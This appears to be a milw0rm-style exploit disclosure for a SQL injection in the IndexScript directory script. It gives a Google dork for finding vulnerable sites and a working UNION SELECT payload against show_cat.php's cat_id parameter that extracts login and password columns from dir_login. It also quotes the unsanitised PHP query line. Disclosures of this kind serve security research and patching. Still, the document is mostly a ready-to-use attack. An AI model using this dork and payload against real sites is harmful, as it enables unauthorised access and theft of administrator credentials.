Site: http://indexscript.com
Found By: xssvgamer
Google Dork: allintext: "This site is powered by IndexScript"
exploit:http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*
Blind SQL injection in indexscript..
Vul Code:
"$sql = "select name, ****_title, ****_description, ****_keywords from dir_cat where " .
"cat_id=" . fnpreparesql($_GET['cat_id']);"
# milw0rm.com